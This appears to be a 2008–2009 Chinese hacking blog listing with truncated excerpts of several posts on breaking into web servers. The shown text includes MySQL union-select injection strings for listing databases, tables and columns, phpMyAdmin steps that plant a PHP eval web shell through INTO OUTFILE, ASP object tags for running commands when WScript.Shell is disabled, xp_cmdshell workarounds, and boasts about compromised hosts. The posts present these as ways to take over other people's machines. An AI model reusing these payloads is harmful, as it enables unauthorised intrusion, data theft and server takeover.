2009-04-08 21:26
from:D总's blog
首先我说明,此文只做为技术交流,同时也并没有什么技术。
前几天再检测有一个服务器的时候,(虚拟主机)管理员的设置很BT,虽然没有禁止WS, 但是呢,CMD等文件均不可以访问,并且不能运行任何系统命令,上传一个MT.exe 到了网站目录,可写,并且使用WS可以运行,因此我首先想到的就是利用WS的命令达到提权,因为没装VNC,PCANwhere,至于系统漏洞的本地提权 也就不用去试都知道了,行不通的,所以拿系统权限只有靠FTP了,但是呢管理员把FTP的本地密码改了,如果是6.2的话,你还可能可以下回来查看到密 码,可 |
2009-02-19 14:27
作者:蓝屏,凯文 冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊….现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯“`
反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
<head>.network对象 |
2009-02-04 10:43
CMD下建立VPN
1.前提
服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去)
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启
两块以上网卡的win2000做vpn很方便,添加nat协议后,客户端拨入,能够使用远程网络连接internet。 使得部分客户端可提高网络速度,并达到代理的作用。
一块网卡的winxp,win2003做类似的vpn仍然很方便,nat协议添加后,再添加两个接口,一个是本地连接,一个是内部,设置本地连接为全转发,内部为私有模式,既可让有权 |
2009-02-04 10:42
一.查看MYSQL基本信息(库名,版本,用户)
and 1=2 union select 1,2,3,database(),5,version(),6,user(),7..../*
二.暴表
and 1=2 union select 1,2,3,TABLE_NAME,4,5,6,7...... from information_schema.TABLES where TABLE_SCHEMA =库的HEX limit 1,1/*
三.暴字段
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7.... |
2009-02-02 20:32
一、后台登录连试'or'='or'的机会都没有,就会出现限制,如下的js
程序代码 程序代码
<SCRIPT language=JavaScript>
<!--
function CheckForm()
{
if (document.UserLogin.Name.value =="")
{
alert("请填写您的用户名!");
document.UserLogin.Name.focus();
return false;
}
var filter=/^\s*[.A-Za-z0-9_-]{5,15}\s*$/;
if (!filter.test(document.UserLogin.name.value)) {
alert("用户名
填写不正确,请 |
2009-01-19 12:33
1.如何拿到登陆密码. 自己想办法
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个Database.运行以下语句.
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php eval($_POST[1]);?>');
select cmd from a into outfile 'D:/phpMyAdmin/libraries/PRIEST.php';
Drop TABLE IF |
2009-01-18 20:41
搞mssql注射的时候 用xp_cmdshell时可能经常回遇到“xpsql.c: Error 2 from CreateProcess on line 539 ”这个错误。这种情况可能是对cmd.exe作了ACL的限制,也可能是cmd.exe被删除或者改名,简单的解决方法是copy cmd.exe to mssql7\binn\cmd.exe |
2008-12-20 11:57
2008-12-03 12:21
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
要想让运行命令可以试试这种方法,成功率为五五之数。
把下面代码复制:
<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>
<%if err then%>
<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04F |
2008-10-19 18:18
由于工作原因,疏于管理肉鸡,用了许久的VPN肉鸡飞了……米办法,因为上一些国外站点需要用VPN,只能再去找几台做VPN用用了。于是找GOOGLE帮忙,搜了下。不一会就找到了个有注入且为SA权限的肉鸡,心想,今天运气不错嘛。一找就给我了个SA。可能有些朋友看到这边,或许该起哄了,都SA了,这还好意思写文章出来,这类文章多的跟米一样,不差我这篇吧。呵呵,如果是一般的情况,我也不会厚脸皮写出来了。请耐心继续往下看,从中你可以学到xp_makecab,xp_unpackcab, xp_regread, sp_configure等扩展存储的使用。
OK,我先说下这台BT肉 |
|
|
|
加为好友
送他礼物
发送消息
